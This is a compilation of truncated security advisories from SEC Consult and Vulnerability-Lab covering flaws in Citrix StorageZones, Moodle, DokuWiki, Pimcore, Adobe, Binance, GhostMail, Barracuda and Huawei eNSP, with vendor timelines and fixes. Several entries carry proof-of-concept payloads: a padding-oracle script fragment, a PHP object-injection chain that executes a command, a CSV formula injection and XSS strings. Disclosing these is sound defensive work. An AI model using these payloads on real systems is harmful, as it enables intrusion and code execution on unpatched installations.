SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 > === title: Multiple Vulnerabilities product: Citrix StorageZones Controller vulnerable version: all versions before 5.4.2 fixed version: 5.4.2 CVE number: CVE-2018-16968, CVE-2018-16969 impact: Medium homepage: https://www.citrix.com/ found: 2018-08 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ShareFile is a file sharing service that enables users to easily and securely exchange documents. ShareFile Enterprise provides enterprise-class service and includes StorageZones Controller and the User Management Tool. ShareFile StorageZones Controller extends the ShareFile software as a service (SaaS) cloud storage by providing your ShareFile account with private data storage, referred to as StorageZones for ShareFile Data. [...]." URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html Business recommendation: Users of this product are advised to install the security patch provided by Citrix. The vulnerabilities identified suggest that no sufficient technical security audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult recommends Citrix to conduct such an audit. Vulnerability overview/description: --- The Citrix StorageZones Controller exposes resources that are typically only available to the internal network (e.g. CIFS Windows shares) to clients connecting from the Internet. In order to hide internal network paths from the user and in order to only allow access to paths specifically allowed by the administrator, internal network paths are encrypted. E.g. if an administrator wants to allow access to an UNC path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided to the client. When the user calls the API to e.g. list the contents of this directory, the StorageZones Controller returns the encrypted absolute paths for each directory entry. This way, the absolute internal paths are always hidden from the user. 1) Improper Access Restrictions Citrix StorageZone Controller offers users a functionality to convert UNC paths into their encrypted form. Therefore, users are able to access any UNC paths accessible by the StorageZones Controller. When providing access to a network share, the StorageZones Controller impersonates the user. Therefore, unauthorized access to network shares is not possible. However, Citrix StorageZones Controller internally does not distinguish between UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows). Therefore, users may access (e.g. read, write, delete) local paths for which they have appropriate NTFS permissions. Note: Citrix StorageZones allows an administrator to define the paths exposed by the StorageZones Controller. By configuring this setting an administrator can restrict access to only network paths. The configuration page incorrectly states that a value of "*" (the default value) "allows connections to all hosts on the internal network", while in fact it also allows access to local paths. 2) Padding Oracle The encryption mechanism used by the Citrix StorageZones Controller is vulnerable to a padding oracle attack. This allows an attacker to partly decrypt or potentially modify internal paths. 3) Path Traversal The upload functionality is vulnerable to a path traversal attack if the preconditions to exploit the vulnerability #1 are met. In practice this vulnerability has a similar effect as vulnerability #1. Proof of concept: - 1) Improper Access Restrictions The following URL demonstrates how local paths can be encrypted: https:///cifs/v3/Items/ByPath?path=c:\ The following URL demonstrates how e.g. the contents of the directory can be listed: https:///cifs/v3/Items()?$expand=Children 2) Padding Oracle The following script demonstrates how encrypted internal paths can partly be decrypted. It may also be possible to partly modify encrypted paths (this has not been verified). snip import sys sys.path.append('python-paddingoracle') from paddingoracle import BadPaddingException, PaddingOracle, xor from base64 import b64encode, b64decode from urllib import quote, unquote import requests import socket import time import getpass URL = 'http:///' AUTH = (raw_input('User: '), getpass.getpass('Password: ')) CIPHER = '' class PadBuster(PaddingOracle): def __init__(self, **kwargs): super(PadBuster, self).__i
SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 > === title: Remote Code Execution via PHP unserialize product: Moodle - Open-source learning platform vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14 CVE number: CVE-2018-14630 impact: critical homepage: https://moodle.org/ found: 2018-07-08 by: Johannes Moritz (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Powering tens of thousands of learning environments globally, Moodle is trusted by institutions and organisations large and small, including Shell, London School of Economics, State University of New York, Microsoft and the Open University. Moodle’s worldwide numbers of more than 90 million users across both academic and enterprise level usage makes it the world’s most widely used learning platform." Source: https://moodle.org/about Business recommendation: The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Remote Code Execution via PHP unserialize (CVE-2018-14630) When importing a "drag and drop into text" (ddwtos) question in the legacy Moodle XML format, the passed feedback answer is used unsanitized in an unserialize() function, which leads to a PHP Object Injection vulnerability. By providing a sophisticated PHP Object chain it is possible to leverage the POI into a fully-blown arbitrary Remote Code Execution (RCE). To exploit this vulnerability an attacker needs permissions to create a quiz or at least be able to import questions. A user of the role teacher usually has these permissions. However, students can also be assigned to the role teacher for a specific course. Proof of concept: - 1) Remote Code Execution via PHP unserialize (CVE-2018-14630) In order to exploit this issue an attacker has to open Moodle's question bank for a specific course and import the following Moodle XML file. The answer feedback contains a sophisticated PHP object chain which only contains objects from Moodles library. After the parsing process the command "echo `whoami`" is being executed. question name O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2: {s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;} Vulnerable / tested versions: - The following version has been tested which was the most recent one at the time of the test: * 3.5.1+ According to the vendor, all previous versions are affected as well: * 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions Vendor contact timeline: 2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie from RIPS Technologies) 2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] created) 2018-07-09: Vendor replied and supplied a fix for the vulnerability 2018-09-10: Vendor releases patched version 2018-09-18: Public release of security advisory Solution: - The vendor provides a patched version (3.5.2) which should be installed immediately: https://download.moodle.org/releases/latest/ The vendor also provided a security advisory regarding this issue: https://moodle.org/mod/forum/discuss.php?d=376023#p1516118 Workaround: --- Disable import of ddwtos questions through XML files. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | A
SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 > === title: CSV Formula Injection product: DokuWiki vulnerable version: 2018-04-22a "Greebo" and older versions fixed version: None CVE number: CVE-2018-15474 impact: Medium homepage: https://www.dokuwiki.org found: 2018-07-09 by: Jean-Benjamin Rousseau (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "DokuWiki is a simple to use and highly versatile Open Source wiki software that doesn't require a database. It is loved by users for its clean and readable syntax. The ease of maintenance, backup and integration makes it an administrator's favorite. Built in access controls and authentication connectors make DokuWiki especially useful in the enterprise context and the large number of plugins contributed by its vibrant community allow for a broad range of use cases beyond a traditional wiki." Source: https://www.dokuwiki.org/dokuwiki Business recommendation: The issue will not be fixed according to the vendor. Users are advised to be careful when opening files via the CSV export functionality. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) CSV Formula Injection vulnerability The administration panel of the application has a "CSV export of users" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that - when exported and opened with a spreadsheet application (Microsoft Excel, Open Office, etc.) - will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk. Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim will be the result. The final impact depends on the used spreadsheet software on the client of the victim. Proof of concept: - 1) CSV Formula Injection vulnerability Registration URL: http://www.example.com/doku.php?id=start=register When the registration request is submitted, the following parameters are sent in a POST request: sectok==register=1=login_parameter=evil_csv_formula_injection_payload=email_address The "fullname" parameter is not sanitized before being stored and during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example: =cmd|'/C calc'!A0 As soon as the file gets opened in Microsoft Excel, the program calc.exe is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source. Vulnerable / tested versions: - The latest version 2018-04-22a "Greebo" has been tested: https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz Also found to be vulnerable: 2017-02-19 stable release 2016-06-26 stable release 2015-08-10 stable release 2014-09-29 stable release 2014-05-05 stable release 2013-12-08 stable release Vendor contact timeline: 2018-07-18: Contacting vendor through a...@splitbrain.org 2018-07-18: Vendor replied, they asked for the advisory without encryption 2018-07-19: Advisory sent without encryption 2018-07-19: Vendor replied with no intention to fix the vulnerability 2018-07-30: Reminder sent to the vendor. No reply 2018-08-20: Ask for updates to the vendor 2018-08-20: Vendor replied that no patch will be provided 2018-09-06: Public release of security advisory Solution: - The issue will not be fixed according to the vendor: https://github.com/splitbrain/dokuwiki/issues/2450 Workaround: --- None Advisory URL: --------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive te
SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 > === title: SQL Injection, XSS & CSRF vulnerabilities product: Pimcore vulnerable version: 5.2.3 and below fixed version: 5.3.0 CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059 impact: High homepage: https://pimcore.com/en found: 2018-06-11 by: T. Silpavarangkura (Office Bangkok) N. Rai-Ngoen (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Pimcore is an award-winning consolidated open source enterprise platform for master data management (PIM/MDM), user experience management (CMS/UX), digital asset management (DAM) and eCommerce." Source: https://pimcore.com/en Business recommendation: The vendor provides a patch for most identified issues, but XSS will not be fixed according to the vendor. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1. SQL Injection (CVE-2018-14058) Multiple SQL injection vulnerabilities have been identified in the REST web service API. An attacker who obtains a valid API key that is granted a necessary permission could successfully perform an attack to extract information from the database. 2. Stored Cross-site Scripting (CVE-2018-14059) Multiple stored cross-site scripting vulnerabilities have been identified across multiple functions in the application, which allows an authenticated attacker to insert arbitrary JavaScript code in virtually all text fields and data entries in the application. 3. Cross-site Request Forgery (CVE-2018-14057) Multiple functions in the application are not protected by the existing anti-CSRF token, which allows an attacker to perform a cross-site request forgery attack to at least add, update or delete entries, among other actions. Proof of concept: - 1. SQL Injection (CVE-2018-14058) The following URLs demonstrate the issue: http:///webservice/rest/asset-count?apikey=[...]= http:///webservice/rest/asset-inquire?apikey=[...]= http:///webservice/rest/asset-list?apikey=[...]= http:///webservice/rest/document-count?apikey=[...]= http:///webservice/rest/document-inquire?apikey=[...]= http:///webservice/rest/document-list?apikey=[...]= http:///webservice/rest/object-count?apikey=[...]= http:///webservice/rest/object-inquire?apikey=[...]= http:///webservice/rest/object-list?apikey=[...]= Note that a valid API key that is granted at least either "Assets", "Documents" or "Objects" permission is required to perform an SQL injection attack against associated API endpoints successfully. 2. Stored Cross-site Scripting (CVE-2018-14059) Most of the text fields in pop-up dialogs and data entries in the application are vulnerable to the cross-site scripting vulnerability, which can be exploited by an authenticated attacker. For example, the attacker could insert an attack payload while performing at least the following actions: 1) Edit a user account's first name/last name/e-mail address. 2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/ Quantity Value/Static Routes entry value in the table. 3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/ Field-Collections/Objectbrick/Classification Store item. The vendor stated that many identified XSS issues only affect administrative functions and hence the issues will not be fixed: "They are only affecting administrative functionalities (higher privileges required) - so this isn't used by non-trusted users - a check just adds additional overhead without any benefits for security." SEC Consult argued multiple times that XSS can still be exploited e.g. when a higher privileged user gets attacked and the issues should be fixed nevertheless. 3. Cross-site Request Forgery (CVE-2018-14057) The existing anti-CSRF token in the HTTP request header named "X-pimcore-csrf-token" was found to be validated only in the "Settings > Users / Roles" function. Therefore, an attacker could perform a cross-site request forgery attack against virtually all other functions in order to at least add, update and delete data without having to submit the anti-CSRF token. The non-exhaustive list of affected requests are listed below: POST /admin/asset/add-asset POST /admin/asset/add-asset-compatibility GET /admin/asset/delete GET /admin/asset/import-server GET /admin
Adobe Systems - Arbitrary Code Injection Vulnerability
00F505[CE]; s_iid=7011402Cc8OAAS; s_cid=7011O02Oq5lQAC; mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548; sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6; s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; faas_form_1_status=completed] Connection[keep-alive] Response Header: Server[Omniture DC/2.0.0] Access-Control-Allow-Origin[*] X-C[ms-5.6.0] ETag["5A895DF8-68DE-70672227"] Vary[*] P3P[CP="This is not a P3P policy"] xserver[www28] Content-Length[6393] Keep-Alive[timeout=15] Connection[Keep-Alive] Content-Type[application/x-javascript] Vulnerable Source: Service Email #1 (Test) RAGEN SIE HERAUS MIT GROSSARTIGEN ERLEBNISSEN. Sehr geehrter Herr "<[PAYLOAD EXECUTION POINT FIRSTNAME & LASTNAME])" <,das Erlebnis wchst sich gerade zum wichtigsten Faktor bei der Kundenbindung aus. Erlebnisse, die persnlich, begeisternd und konsistent auf jedem Kanal und Endgert sind – das ist jetzt Ihr grßter Wettbewerbsvorteil. Besuchen Sie unseren Adobe Summit EMEA 2018. Erleben Sie bei uns, was es fr außergewhnliche digitale Erlebnisse wirklich braucht. Erfahren Sie von Unternehmen wie Sky, DHL oder Raiffeisen, wie sie diese neuartigen Erlebnis-Angebote realisiert haben, die ihre Geschftsmodelle heute bereits von der Konkurrenz abheben. Vulnerable Source: Service Email #2 (Test) http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46p1=7011O02bSn9QAEp2=003142mfNt5AAE; target="_blank" style="color:#0099ff;">https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketing/events/images/other/49460e.de.because-we-keep-innovating-we-keep-leading.640x597.jpg; style="vertical-align:top; overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;" width="320" vspace="0" hspace="0" height="340" border="0"> Sehr geehrter Herr "%20"[PAYLOAD EXECUTION POINT FIRSTNAME & LASTNAME],Forrester stuft Adobe als Leader bei Web-Analysen ein. Lesen Sie in The Forrester Wave™: Web Analytics, Q4 2017, weshalb wir weiter den Ton angeben – mit aussagekräftigen und verwertbaren Einblicken für alle Mitarbeiter im Unternehmen. Reference(s): https://www.adobe.com http://t.info.adobesystems.com http://m.info.adobesystems.com https://offers.adobe.com https://sstats.adobe.com https://apps.enterprise.adobe.com http://landing.adobe.com http://t-info.mail.adobe.com https://offflivestream.creativecloud.adobeevents.com https://summit-emea.adobe.com Solution - Fix & Patch: === 1. Restrict and filter the input fields and disallow usage of script code tags for inputs 2. Encode the context of the input fields during the post method request submit to prevent malformed injects 3. Parse the firstname and lastname and company values in outgoing emails with all adobe service templates 4. Implement a filter mechanism with exception-handling to parse contents delivered from an external service to the sub-service followed by the main lead database 5. Provide awareness to employees by explaining the specific impact of the attack points to prevent the manual delivery 6. Develop a process to remove compromised information from the main database or backups 7. Ensure that a web-firewall captures those incidents to alert or react to ensure that an attacker is not able to move through the separate database segments The reported urls has been reported and disarmed already by the adobe systems psirt and developer team. The issue has been patched in multiple functions. The forumulars are already restricted and the case scenario has been full transparent delivered to ensure the problematic becomes visible to adobe. (Example: http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D) Security Risk: == The security risk of the arbitrary code injection vulnerability in the adobe web services are estimated as high. Credits & Authors: == Benjamin K.M. (Vulnerability Laboratory Core Research Team)[resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the
Binance v1.5.0 - Insecure File Permission Vulnerability
Document Title: === Binance v1.5.0 - Insecure File Permission Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2135 Release Date: = 2018-07-17 Vulnerability Laboratory ID (VL-ID): 2135 Common Vulnerability Scoring System: 2.5 Vulnerability Class: Access Permission Weakness Current Estimated Price: 500€ - 1.000€ Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered an insecure file permission vulnerability in the Binance v1.5.0 software. Vulnerability Disclosure Timeline: == 2018-07-15: Researcher Notification & Coordination (Security Researcher) 2018-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Binance Product: Binance 1.5.0 Exploitation Technique: === Local Severity Level: === Low Authentication Type: Full authentication (admin) - full privileges User Interaction: = Medium User Interaction Disclosure Type: Independent Security Research Technical Details & Description: Insecure File Permissions vulnerability has been discovered in the official Binance v1.5.0 software. The vulnerability allows local attackers to exploit insecure permissions setup for a software or process to exploit by manipulation. The vulnerability exists due to insecure default permissions set on the Binance.exe, start.exe and unins000.exe There are no integrity checks or validation proof to ensure that the executable file is not modified during the runtime or after it. A local attacker could exploit the local vulnerability by replacing `Binance.exe` and `start.exe` or `unins000.exe` with a malicious executable file. The malicious file could execute or modify with the LocalSystem permissions to followup with successful exploitation. Proof of Concept (PoC): === Binance for windows contains a vulnerability that could allow a local attacker to gain elevated privileges. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. -- PoC Session Logs (Permissions) -- C:Binance>icacls binance.exe Binance.exe BUILTINAdministrateurs:(I)(F) <--- Full Access AUTORITE NTSystème:(I)(F) BUILTINUtilisateurs:(I)(RX) AUTORITE NTUtilisateurs authentifiés:(I)(M) <--- Modify Information: 1 files correctly processed; 0 files failed to process C:Binance>icacls start.exe start.exe BUILTINAdministrateurs:(I)(F) <--- Full Access AUTORITE NTSystème:(I)(F) BUILTINUtilisateurs:(I)(RX) AUTORITE NTUtilisateurs authentifiés:(I)(M) <--- Modify Information: 1 files correctly processed; 0 files failed to process C:Binance>icacls unins000.exe unins000.exe BUILTINAdministrateurs:(I)(F) <--- Full Access AUTORITE NTSystème:(I)(F) BUILTINUtilisateurs:(I)(RX) AUTORITE NTUtilisateurs authentifiés:(I)(M)<--- Modify Information: 1 files correctly processed; 0 files failed to process Solution - Fix & Patch: === Include multiple integrity checks for the software files on startup and during the static runtime. Change the access permissions for the process of all three executables files (binance.exe, stat.exe & uninst00.exe). Security Risk: == The security risk of the insecure file permissions vulnerability and missing integrity check in the software core is estimated as low. Credits & Authors: == ZwX [Vulnerability Laboratory - Security Manager] - https://www.vulnerability-lab.com/show.php?user=ZwX Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability
GhostMail - (filename to link) POST Inject Web Vulnerability
chars. Escape the web context to prevent an application-side script code execution vulnerability. The vulnerability has been reported 2016-10-01. The issue was resolved during the 2017 Q2 - Q4 by the ghost mail developer team. Security Risk: == The security risk of the application-side input validation web vulnerability in the ghostmail mail module is estimated as medium (CVSS 4.2). Credits & Authors: ====== Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ===== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability
agement_type=Local=13633=de_DE& secondary_tab=edit_user_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c_only=1_user= 1337benny%40barracuda.com">http://www.vulnerability-lab.com onload=alert("VulnerabilityLab") < _name=devices_filter=bccadmin=benny%40barracuda.com=1_name= user_management_width=800_height=500> PoC: INDEX.CGI - Mail Listing (Output) (Benutzer bearbeiten > Benutzerspezifische Bayessche Daten) [target_user] Benutzerspezifische Bayessche Daten: 1337be...@barracuda.com"><[EXECUTION OF CLIENT SIDE SCRIPT CODE!])' <<="" td=""> Reference(s): https://bcc.127.0.0.1:1336/ https://bcc.127.0.0.1:1336/cgi-mod/ https://bcc.127.0.0.1:1336/cgi-mod/index.cgi Solution - Fix & Patch: === The vulnerability can be patched by a secure parse and encode of the vulnerable index.cgi file. Restrict the input of the vulnerable marked values and disallow the usage of special chars. Use entities and filter all inputs with an exception-handling to prevent client-side exploitation. Note: The issue was reported in 2016 Q4 to the barracuda networks developer team. The issue was finally resolved in 2017 Q3 - Q4. The disclosure process took about 8month to complete by recognizing the patch cycle. Security Risk: == The security risk of the non-persistent cross site scripting vulnerability in the target_user value parameter is estimated as medium. Credits & Authors: == Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
GhostMail - (Status Message) Persistent Web Vulnerability
Document Title: === GhostMail - (Status Message) Persistent Web Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1470 Release Date: = 2018-06-27 Vulnerability Laboratory ID (VL-ID): 1470 Common Vulnerability Scoring System: 4 Vulnerability Class: Script Code Injection Current Estimated Price: 1.000€ - 2.000€ Product & Service Introduction: === Sign up to military grade encrypted GhostMail and enjoy instant free and secure email & chat. No download or installs needed. GhostMail is your new secure email & chat platform, with great features like self destruction, two factor login and much more... Join free today and start enforcing your privacy and online rights. (Copy of the Vendor Homepage: https://www.ghostmail.com/ ) Abstract Advisory Information: == The vulnerability laboratory core research team discovered an application-side vulnerability in the official GhostMail chat online service web-application. Vulnerability Disclosure Timeline: == 2018-06-27: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): GhostCom Ltd. Product: GhostMail (Chat) - Web Application (Online Service) 2015 Q2 Exploitation Technique: === Remote Severity Level: === Medium Authentication Type: Restricted authentication (user/moderator) - User privileges User Interaction: = Low User Interaction Disclosure Type: Bug Bounty Program Technical Details & Description: An application-side html injection web vulnerability has been discovered in the official GhostMail chat web-application. The vulnerability allows to inject unauthorized malicious script codes on the application-side of the affected module. The issue exists in chat status of the application and is remotly exploitable against other ghostmail user accounts. The request method to inject is POST and the attack vector is located on the application-side of the affected online service web-application. The encoding of the status message in the chat client is broken. Local and remote attackers can use the lack of validation to perform html injection attacks to compromise user/moderator/admin session data. The security risk of the html injection web vulnerability is estimated as medium with a cvss count of 4.0. Exploitation of the issue requires a low privileged web-application user account and no direct user interaction. Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation affected or connected module context. Vulnerable Domain(s): [+] Ghostmail.com Vulnerable Module(s): [+] Status Message Vulnerable Parameter(s): [+] Status message body context Proof of Concept (PoC): === The html injection web vulnerability can be exploited by local and remote attackers with low user interaction and low privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual Steps to reproduce the vulnerability ... 1. Register an account and login to the ghostmail application 2. Move to the chat status contents 3. Close the tag of title with double quote " 4. Now, add a new malicious content as payload in the status title for the chat 5. Start to chat and in the same moment the execution of the script code occurs at both party sides of the client 6. Successful reproduce of the vulnerability! Note: There is no filter validation or mechanism in place to prevent an execution within the ghostmail web-application. Reference(s): https://www.ghostmail.com/ Solution - Fix & Patch: === The vulnerability can be patched by a parse and encode of the vulnerable status mesage in the ghostmail chat client. The issue has been reported in 2016 Q4 (2016-10-01) and was finally resolved in 2017 Q3 - Q4 by the ghostmail developer team. Security Risk: == The security risk of the application-side input validation web vulnerability in the chat module is estimated as medium (CVSS 4.0). Credits & Authors: ========== Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantabilit
Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability
Document Title: === Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability References (Source): https://www.vulnerability-lab.com/get_content.php?id=2132 Security ID: huawei-sa-20180309-01-ensp https://nvd.nist.gov/vuln/detail/CVE-2017-17321 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17321 Acknowledgements: https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17321 CVE-ID: === CVE-2017-17321 Release Date: = 2018-07-13 Vulnerability Laboratory ID (VL-ID): 2132 Common Vulnerability Scoring System: 3.3 Vulnerability Class: Buffer Overflow Current Estimated Price: 500€ - 1.000€ Product & Service Introduction: === Enterprise Network Simulation Platform (eNSP) is a free, scalable, and graphic network simulation platform developed by Huawei. Huawei eNSP is a management and support software as service. (Copy of the Homepage: https://support.huawei.com/enterprise/en/network-management/ensp-pid-9017384 ) Abstract Advisory Information: == The vulnerability laboratory core research team discovered a buffer overflow causing a denial of service in the official Huawei eNSP v1. Vulnerability Disclosure Timeline: == 2018-07-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Huawei Product: eNSP v100R002C00B510 v100R002C00B500 Huawei Product: eNSP V100R002C00B390 V100R002C00B380 V100R002C00B370 V100R002C00B Huawei Product: eNSP V100R002C00B210 V100R002C00B200 Huawei Product: eNSP V100R002C00B120 V100R002C00B110 